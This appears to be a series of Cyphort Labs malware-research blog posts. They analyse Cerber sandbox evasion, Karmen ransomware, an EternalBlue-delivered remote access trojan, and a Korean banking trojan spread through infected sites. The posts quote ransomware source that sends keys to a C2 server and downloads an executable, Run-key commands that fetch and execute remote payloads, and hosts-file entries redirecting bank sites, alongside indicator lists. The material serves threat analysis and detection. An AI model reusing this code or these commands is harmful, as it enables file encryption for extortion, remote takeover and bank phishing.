The following 2 diagrams show what changed in the Import Address when there is a hook or not. Notice the difference in the First Thunk Address. In the first image, there is no hook so it was able to traverse through the IAT and retrieve the first API imported by the main executable which is GetFileAttributesA. In the second image where there is hook, the First Thunk points the address space of the hooking module, 0x6D64415C. This could result into some invalid address de-referencing as we noticed in this sample or the malware will just fail to retrieve those APIs and will not proceed on unpacking routine.

No Hooking

With Hook

Why display an installation window?

Interestingly, the malware could have just chosen to make itself crash but why would it need to display that installation window? We believe that this is an added step of the malware  to trick the sandbox into thinking that the program is a normal installation. Going through the typical installation routine would add or contribute to the conviction of the sandbox that the program is “normal”.

What can sandbox do to protect itself against this technique

Sandboxes always need to look for new armoring techniques. In the first anti-armoring technique discussed here, a sandbox can employ exception handlers to handle these types of errors. This gives a protection to the hooking module to not crash. For the long loop, a sandbox can identify the behavior as suspicious or it can try to accelerate those long loops if it is capable to do so. 

We believe that these Cerber samples are related to an ongoing spam campaign called ‘Blank Slate‘. Cyphort detects this malware as TROJAN_ZERBER.DC. 

Special thanks to Alex Burt, Anoop Saldanha, Abhijit Mohanta and the rest of the Cyphort Labs Team for helping with analysis.

Indicators of Compromise

MD5

260c4918a8655949d58b2e8d11d1562a

037a8be0c33ab5f34c150de153402048

IP Ranges

149.202.122.0/27

149.202.248.0/22

149.202.64.0/27

The post New Breed of Cerber Ransomware Employs Anti-Sandbox Armoring appeared first on Cyphort.

Karmen is a new RaaS (Ransomware as a Service) being offered in the underground forum. According to a recent research from Recorded Future, this ransomware is being advertised and sold in a Russian-speaking underground hacking forum at a relatively cheap price of $175.

Karmen was first spotted  by MalwareHunter in mid-March. Cyphort currently detects this file as RANSOM_FILECRYPTOR.DC. CyphortLabs took a deeper analysis of one sample and uncovered some flaws that make this ransomware somewhat not so tight.

File Properties

MD5: 05427ed1c477cc01910eb9adbf35068d

Compilation Time Stamp: Sun Mar 12 07:25:00 2017
The file is a .NET compiled executable. It is not packed nor obfuscated, so strings and IOCs related to the malware can be easily seen using basic string checking tools:

String dump using PE Studio

Installation

Karmen will generate 2 random strings. First, a 30-byte key for its AES encryption and then a 15-byte key used as the ID of the infected machine.

private void Form1_Load(object sender, EventArgs e)

       {

           string text = this.gen(30);

           string text2 = this.gen(15);

           new WebClient().DownloadString("http://91.223.123.78/data.php?id=" + text2 + "&key=" + text);

           this.ldf(text);

           this.Inf(text2);

           Application.Exit();

       }

It will then send the AES key and the ID to a hardcoded ip address, 91.223.123.78 via HTTP. The communication is not encrypted nor obfuscated so by intercepting the network communication, you can obtain the encryption key used. This is probably why Karmen is advertising that it will delete the decryption module if an analysis environment is detected.

Encryption

After sending the key and ID to its C2 server, it will enumerate all logical drives and start encrypting all files with the following extension names:

.sql
.css
.docx
.csv
.js
.exl
.zip
.txt
.kdbx
.mdbackup
.pdf
.kdb
.syncdb
.doc

It uses a basic AES-256 encryption method.

        public void enf(string file, string pwd)

       {

           byte[] bytesToBeEncrypted = File.ReadAllBytes(file);

           byte[] array = Encoding.UTF8.GetBytes(pwd);

           array = SHA256.Create().ComputeHash(array);

           byte[] bytes = this.AES_Encrypt(bytesToBeEncrypted, array);

           File.WriteAllBytes(file, bytes);

           File.Move(file, file + ".grt");

       }

Once the files are encrypted, it adds the file extension “.grt” to the original files. This is used by the malware as a marker of encrypted files. This is a good indicator that you are probably infected by the Karmen Ransomware.

Decryptor

It will download another executable, decrypter.exe, from the same C2 server and create an autostart entry for it.  This is most likely the decryptor tool. Along with it, it gets additional data from C2 and creates the following components in the %temp% folder.

Id.txt
lnk.txt
btc.txt
adr.txt
del.bat

   public void Inf(string id)

       {

           WebClient webClient = new WebClient();

           string text = "C:\\Users\\" + Environment.UserName + "\\AppData\\Local\\Temp\\";

           webClient.DownloadFile(new Uri("http://91.223.123.78/decrypt.exe"), text + "decrypt.exe");

           RegistryKey registryKey = Registry.CurrentUser.CreateSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run\\");

           try

           {

               registryKey.SetValue("DecryptFiles", text + "decrypt.exe");

               registryKey.Close();

           }

           catch

           {

           }

           this.CreateFile(text, "id.txt", id);

           this.CreateFile(text, "lnk.txt", "http://91.223.123.78/");

           this.CreateFile(text, "btc.txt", this.GetFile("http://91.223.123.78/btc.php?id=" + id));

           this.CreateFile(text, "adr.txt", this.GetFile("http://91.223.123.78/adr.php?id=" + id));

           string[] contents = new string[]

           {

               "@echo off",

               "taskkill /f /im decrypt.exe",

               "del " + text + "decrypt.exe",

               "del " + text + "lnk.txt",

               "del " + text + "btc.txt",

               "del " + text + "adr.txt",

               "del " + text + "del.bat"

           };

           File.WriteAllLines(text + "del.bat", contents);

           Process.Start(text + "decrypt.exe");

       }

During the time of our analysis, the C2 server was down so we were not able to get a copy of the decrypter code. But we believe based on the code we saw that the decryptor will run in the background waiting for a signal from C2 server to start decrypting after the ransom is paid.

However, we were able to obtain a different variant of decrypt.exe. This one though, was downloaded from a different domain, so it seems, this malware is now active in the wild.

MD5: 1ea26d0af5da76110e248da85656a184
It gets very few detections from AVs on the first submission to VirusTotal.

Cyphort currently detects this file as RANSOM_HIDDENTEAR.DC.

The malware displays the following window when executed without any close or exit button. It also has an option to display German and English language which gives us an idea about the author’s target.

The decryptor will first check if the machine contains the file %temp%\id.txt which contains the id of the infected user, if not found it will just delete itself.

If the said file above exists, it will then connect to its C2 server with the id to get the decryption key:

        public void Check(string id, string lnk)

       {

           string text = this.inf(lnk + "check.php?id=" + id);

           bool flag = text.Length > 25;

           if (flag)

           {

               this.timer1.Enabled = false;

               this.fDD(text);

           }

       }

The server decides if it will return the key or not most likely based on whether the user has paid the ransom. Decryptor expects the key to be greater than 25 bytes. If the condition is satisfied, it will proceed with the decryption process using the obtained key.

Karmen’s Weaknesses

Weak Key Management  and Symmetric Encryption
Karmen uses the typical AES-256 encryption which could be brute forced. Aside from this, it exposes the key by sending it to the C2 server in plain text format. So if you have managed to capture the Network Traffic, the key can be easily recovered. Due to the fact that it is based on HiddenTear (an open sourced ransomware), some have already created a decryption tool for this ransomware.

Not Deleting Backups
The said Ransomware also failed to delete the backups such as the shadow copies which gives hope to the infected user to simply recover by restoring shadow copies.

Final Thoughts

The malware we analyzed is probably a light or an early version of Karmen RaaS. We are not able to identify a sample that detects a sandbox or analysis tools as it is advertised in the underground forum. The distribution of the malware is currently unknown but we believe that some of them are currently in the wild. Despite being a cheap and working service, we have found several weaknesses to Karmen. The way the encryption method is implemented, we believe that the authors behind this are probably new to the field of ransomware. Having said that, any ransomware is still a dangerous threat and will always be a pain when infected.

Special thanks to Joe Dela Cruz and the rest of Cyphort Labs team for their help with the analysis.

The post Karmen Ransomware-as-a-Service flawed appeared first on Cyphort.

During the WannaCry pandemic attack, Cyphort Labs discovered that other threat actors have been using the same EternalBlue exploit to deliver other malware. This malware is not a ransomware and is not a bitcoin miner either as others have reported. This one is a remote access trojan typically used to spy on people’s activities or take control of their computers for whatever end the attacker wants to reach.

On May 12, at the onset of the WannaCry attack, Cyphort Labs researchers have seen a similar SMB attack to one of our honeypot servers. Later on, we found evidence of the same attack perpetrated on May 3.

Network capture of the SMB exploit

It was very much the EternalBlue exploit based on the ET rule hits below:

05/12/2017-17:27:19.766291  [**] [1:2024217:2] ET EXPLOIT Possible ETERNALBLUE MS17-010 Heap Spray [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 182.18.23.38:55768 -> 192.168.160.60:445

05/12/2017-17:27:20.225752  [**] [1:2024217:2] ET EXPLOIT Possible ETERNALBLUE MS17-010 Heap Spray [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 182.18.23.38:55768 -> 192.168.160.60:445

05/12/2017-17:27:20.652098  [**] [1:2024218:1] ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.160.60:445 -> 182.18.23.38:55768

05/12/2017-17:27:26.772666  [**] [1:2024218:1] ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.160.60:445 -> 182.18.23.38:55768

We initially thought this is WannaCry, but upon further investigation, we discovered a stealthier Remote Access Trojan. Unlike wannaCry, this threat infects only once and does not spread. It is not a worm.

Payload

Based the pcap, the attacking IP is 182.18.23.38. This IP is located in China.

Once the exploitation is successful, the attacker will send an encrypted payload as a shellcode. The shellcode is encrypted via XOR with the key, “A9 CA 63 BA”. The shellcode has an embedded binary in it as shown below:

File Properties of the Embedded DLL

MD5: B6B68FAA706F7740DAFD8941C4C5E35A

SHA1: 806027DB01B4997F71AEFDE8A5DBEE5B8D9DBE98

Time Stamp: Sat Apr 29 09:57:21 2017

Debugging Symbols Path: d:\down10\release\down10.pdb

Exports: DllMain, test, InWMI

The embedded DLL is basically a trojan which downloads additional malware and receives commands from its controller. It waits for the following commands:

• [down]
• [cmd]

The commands are downloaded  from “http://down[.]mysking.info:8888/ok.txt”

The [down] command instructs the malware to download from a link and save it as the second parameter. Here, it will download “http://23.27.127.254:8888/close.bat” and save it as c:\windows\debug\c.bat

The [cmd] command is followed by a series of commands that the malware will execute.

Based on the commands above, it will try to delete the following users:

• Asps.xnet
• IISUSER_ACCOUNTXX
• IUSR_ADMIN
• snt0454
• Asp.net
• aspnet

It will terminate and/or delete the following Files or Processes

• c:\windows\Logo1_.exe
• c:\windows\dell\Update64.exe
• Misiai.exe
• c:\windows\RichDllt.dll
• C:\windows\winhost.exe
• C:\windows\ygwmgo.exe
• c:\windows\netcore.exe

It creates a job file “Mysa” that would download a file a.exe via FTP from down.mysking.info.

It sets the following Registry Run entries to download and execute additional malware.

• reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v “start” /d “regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll” /f
• reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v “start1” /d “msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q” /f

Then it will execute c.bat and execute another DLL file item.dat:

• rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa

In addition, it connects to http://wmi[.]mykings.top:8888/kill.html to obtain a checklist of processes to terminate.

2nd Stage Payload: Item.dat

We were not able to capture item.dat from our own server. This file is saved as C:\Windows\debug\item.dat and the [cmd] command expects it to be there. We believe that this is the second stage payload. We researched Virustotal for such files and found this hash:

• e6fc79a24d40aea81afdc7886a05f008385661a518422b22873d34496c3fb36b

Virustotal has seen this malware to be downloaded from the following links

• http://67[.]229.144.218:8888/test1.dat
• http://47[.]88.216.68:8888/test.dat
• http://47[.]52.0.176:8888/item.dat
• http://118[.]190.50.141:8888/test.dat

This means the actors used those above IPs for their activities. It also appears to affect multiple regions based from the Virustotal submission sources.

This sample was first seen on Virustotal on April 2, 2017. And since then, we have seen 12 other similar samples on VT:

0108036951155a66879491ffc499cdb1e451e9ade58d62521a49a07aa4c79b74

25db9243e3fb0b18a8847c001b05c02b3cc686752a2e4ae28c4678d513b48e6f

b899ba1e426b838dd75d541cfe48d08a49453fb901e2808a15bbb44e08983d68

19fce399808befd7dfe92a0ab7cd006357f0d3a8a519a14953a3d217cca8ae48

557b13d6562b780612d932a6c0513acd8316885357b70ba5a8aedbbaa83668a9

56a35e6de83b7a6e9ecb731a5a636e91ab32899eb90fbec24c8f4d40467ca5d9

ec7fd8909baaf79077368dd113294c43e7269b323473e8825e73f64e2f71d0af

ceef5ea176716e225cc2389f0629b4d1ae3edb83c490c70f415c51a1b5118c19

05104184573f666dbf000c8150fc17c186e98de2c33f4177a406d125af751388

4d5cf13167537ce422ad0fe00f60ac523defde5ad0304a1d04eed77e9d590df0

ed5e704c63d5ec60adba8b5b56147f5c92f236b5410aff7246e8dab89961a51b

cf3cd50f7ce87d2a83ccda680a2bd82a45d62714432820cd0a5d7d784f08e147

This is an indication that they might have been using the EternalBlue exploit well before the WannaCry outbreak on May 12, 2017.

The sample is protected by Safengine Shielden packer.

Packer Protector of item.dat

Based on the following dump, this sample appears to be a RAT that gives the attacker access and control of the infected machine.

Memory Dump of running item.dat

Based from the strings above, we found the following program, ForShare 8.28 having similarites. The program is hosted on a Chinese website.

• http://en.pudn.com/downloads758/sourcecode/windows/detail3014472_en.html
• http://www.codeforge.cn/read/287854/MyClientTran.cpp__html

ForShare 8.28 GUI found on the web

Based on the source code, we confirmed that the malware is using a version of this ForShare Remote Access Tool. The RAT has lots of spy features and among them are as follows:

• Receive and execute commands from server
• Screen Monitoring
• Audio and Video Surveillance
• Monitor Keyboard
• File and Data Transfer
• Delete Files
• Terminate Processes
• Execute Files
• Enumerate Files and Processes
• Download Files
• Control the machine

Below is a snippet of the commands of this RAT.

Close.bat

One interesting act the malware did is it closed the port 445 by executing close.bat. Close.bat or c.bat contains the following code:

This is yet another indication that the malware is probably aware of the Eternal Blue vulnerability and is closing it. The threat actors probably did not want other threats mingling with their activity. We believe that the group behind this attack is the same group that spreads Mirai via Windows Kaspersky discovered in February.  We found similarities in terms of their IOCs.

Conclusion

WannaCry ransomware delivered a strong message to the world by being noisy and destructive. It seems that the message is clear now; that there are many systems out there that are vulnerable to Cyberattacks. At first glance, the threat we discovered may not appear to be as destructive as the WannaCry ransomware,  but it may be equally dangerous if not more, depending on the attacker’s intent. The main payload is a RAT and we all know what can happen once a malicious hacker gets inside your enterprise. In addition, if WannaCry did not happen, we may not be aware of a number of systems that are vulnerable to exploits whether they are zero-day, disclosed or undisclosed, and that makes this type of stealthy threat more dangerous. What will hurt you the most are those things that you did not see coming.

Special thanks to Joe Dela Cruz,  Alex Burt, Abhijit Mohanta and the rest of the Cyphort Labs for their help in analysis and discovery of this threat.

Indicators of Compromise

Files

C:\Windows\debug\c.bat

C:\Windows\debug\item.dat

SHA256

E6fc79a24d40aea81afdc7886a05f008385661a518422b22873d34496c3fb36b

0108036951155a66879491ffc499cdb1e451e9ade58d62521a49a07aa4c79b74

25db9243e3fb0b18a8847c001b05c02b3cc686752a2e4ae28c4678d513b48e6f

b899ba1e426b838dd75d541cfe48d08a49453fb901e2808a15bbb44e08983d68

19fce399808befd7dfe92a0ab7cd006357f0d3a8a519a14953a3d217cca8ae48

557b13d6562b780612d932a6c0513acd8316885357b70ba5a8aedbbaa83668a9

56a35e6de83b7a6e9ecb731a5a636e91ab32899eb90fbec24c8f4d40467ca5d9

ec7fd8909baaf79077368dd113294c43e7269b323473e8825e73f64e2f71d0af

ceef5ea176716e225cc2389f0629b4d1ae3edb83c490c70f415c51a1b5118c19

05104184573f666dbf000c8150fc17c186e98de2c33f4177a406d125af751388

4d5cf13167537ce422ad0fe00f60ac523defde5ad0304a1d04eed77e9d590df0

ed5e704c63d5ec60adba8b5b56147f5c92f236b5410aff7246e8dab89961a51b

cf3cd50f7ce87d2a83ccda680a2bd82a45d62714432820cd0a5d7d784f08e147

IP, URLs, and Domains

182.18.23.38

Js.mykings.top

Down.mysking.info

Wmi.mykings.top

23.27.127.254

118.190.50.141

47.52.0.176

47.88.216.68

67.229.144.218

http://67.229.144.218:8888/test1.dat

http://47.88.216.68:8888/test.dat

http://47.52.0.176:8888/item.dat

http://118.190.50.141:8888/test.dat

http://down.mysking.info:8888/ok.txt

http://wmi.mykings.top:8888/kill.html

http://23.27.127.254:8888/close.bat

http://js.mykings.top:280/v.sct

http://js.mykings.top:280/helloworld.msi

scdc.worra.com

The post EternalBlue Exploit Actively Used to Deliver Remote Access Trojans appeared first on Cyphort.

On September 18, 2015, we saw an activity on koreatimes.com where we captured a malicious binary. We investigated further and found that this campaign is specifically targeted to Korean sites and Korean banks. 

We looked at our logs for this year and found more Korean websites infected:

• koreatimes.com (Sep. 18, 2015)
• filehon.com(May 30, 2015)
• joara.com (May 3, 2015)
• hometax.go.kr (May 3, 2015)
• soriaudio.co.kr (April 23, 2015)
• gomsee.com (March 16, 2015)
• lottoplay.co.kr (Feb 6, 2015)
• insight.co.kr (Jan 31, 2015)
• filecity.co.kr (Jan 23, 2015)
• nggol.com(Jan 6, 2015)
• koreamanse.com(Jan 6, 2015)

The payload we got also specifically targets Korean banks by modifying the infected systems hosts file to redirect traffic from Korean banks to its controlled server. This means the attacker can craft a phishing website without the user knowing it is visiting a phishing site. It also targets Ahnlab by killing processes and deleting files specific to the software. Ahnlab is a popular antivirus software in South Korea.

                                                              Infection Flow

Website Infection

This following analysis will focus on the infection that took place in koreatimes.com

The culprit is a javascript file named “2013_gnb.js” which is an iframe injector leading to KaiXin EK landing page.

It exploits the following vulnerabilities:

• CVE-2014-6332 (IE)
• CVE-2011-3544 (Java)
• CVE-2015-0336 (flash)

We found interesting strings on the flash file which gives us an idea about the attackers platform on building its exploit and references to the attacker. Also an interesting string “King Lich V” was found on the flash file which  is likely the author’s signature. That string was found also found in other attacks involving Chinese group. Flash file was also packed using DoSWF.

Once the exploitation is successful, it has two options to execute its payload.  If it is running in Windows 7 or 8, it will fire a powershell script that will download an executable file from 199[.]188[.]106[.]161.

Else, it executes a shellcode that downloads from “www[.]jfkdsajfk5263[.]com/server[.]jpg”. The former was basically used to bypass DEP

The binary downloaded is a banking malware with backdoor capabilities under the family of Venik.

Backdoor Venik

“Venik” is a Russian word for a besom, or broom, used in Russian bathhouses.

The binary downloaded is actually dropper which when executed installs a dll file in C:\{random} folder using random name like “c:\tqcsv\krxxc.rxk”. It executes this dll as:

• “%system32%\rundll32.exe” “c:\tqcsv\krxxc.rxk”,Start

Creates mutex (M142.0.137.66:3201) and creates autostart key entry such as:

• HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  • EvtMgr – “c:\windows\system32\rundll32.exe “c:\tqcsv\krxxc.rxk”,Start”

After installation, it beacons out to its server by contacting the following urls:

• http://142[.]0[.]137[.]68:803
• http://142[.]0[.]137[.]67:805/index.php

It also opens a connection to 142.0.137.66 using TCP port  3201 and waits for a command from the server. The server can issue a command that starts a remote access service from the infected client.

It also collects files from %ProgramFiles% folder and mapped drives. It copies the files to a random file in C:\ using xcopy  and uploads the file to its server using an HTTP session.

It modifies the hosts file (%system32%\drivers\etc\hosts) and adds the following lines. It effectively redirects the users visit of banking sites to a site controlled by the attacker which is actually a phishing site:

142.0.137.199 www.shinhan.com.or
142.0.137.199 search.daum.net
142.0.137.199 search.naver.com
142.0.137.199 www.kbstar.com.or
142.0.137.199 www.knbank.vo.kr
142.0.137.199 openbank.cu.vo.kr
142.0.137.199 www.busanbank.vo.kr
142.0.137.199 www.nonghyup.com.or
142.0.137.199 www.shinhan.ccm
142.0.137.199 www.wooribank.com.or
142.0.137.199 www.hanabank.ccm
142.0.137.199 www.epostbank.go.kr.or
142.0.137.199 www.ibk.co.kr.or
142.0.137.199 www.ibk.vo.kr
142.0.137.199 www.keb.co.kr.or
142.0.137.199 www.kfcc.co.kr.or
142.0.137.199 www.lottirich.co.ir
142.0.137.199 www.nlotto.co.ir
142.0.137.199 www.gmarket.net
142.0.137.199 nate.com
142.0.137.199 www.nate.com
142.0.137.199 daum.com
142.0.137.199 www.daum.net
142.0.137.199 daum.net
142.0.137.199 www.zum.com
142.0.137.199 zum.com
142.0.137.199 naver.com
142.0.137.199 www.nonghyup.com
142.0.137.199 www.naver.com
142.0.137.199
142.0.137.199 www.nate.net
142.0.137.199 hanmail.net
142.0.137.199 www.hanmail.net
142.0.137.199 www.hanacbs.com
142.0.137.199 www.kfcc.co.kr
142.0.137.199 www.kfcc.vo.kr
142.0.137.199 www.daum.net
142.0.137.199 daum.net
142.0.137.199 www.kbstir.com
142.0.137.199 www.nonghuyp.com
142.0.137.199 www.shinhon.com
142.0.137.199 www.wooribank.com
142.0.137.199 www.ibk.co.kr
142.0.137.199 www.epostbenk.go.kr
142.0.137.199 www.keb.co.kr
142.0.137.199 www.citibank.co.kr.or
142.0.137.199 www.citibank.vo.kr
142.0.137.199 www.standardchartered.co.kr.or
142.0.137.199 www.standardchartered.vo.kr
142.0.137.199 www.suhyup-bank.com.or
142.0.137.199 www.suhyup-bank.com
142.0.137.199 www.kjbank.com.or
142.0.137.199 www.kjbank.com
142.0.137.199 openbank.cu.co.kr.or
142.0.137.199 openbank.cu.co.kr
142.0.137.199 www.knbank.co.kr.or
142.0.137.199 www.knbank.co.kr
142.0.137.199 www.busanbank.co.kr.or
142.0.137.199 www.busanbank.co.ir
142.0.137.199 www.suhyup-bank.com
142.0.137.199 www.suhyup-bank.ccm
142.0.137.199 www.standardchartered.co.kr

                               Host File Modification

The phishing site asks for sensitive information that are not usually ask during a normal online banking session. 

There are also times that it will ask the user to visit other banking sites leading to phishing sites. This happens when it is likely that the phishing site does not currently support a bank.

Adding to its attack on Korean related services, it tries to disable Ahnlab related files and process. Ahnlab is a popular antivirus software in South Korea.

As of September 25, we verified that koreatimes.com is clean from this infection.

Related Samples

Credits to Alex Burt for his help in discovery of this  infection.

The post Infected Korean Website Installs Banking Malware appeared first on Cyphort.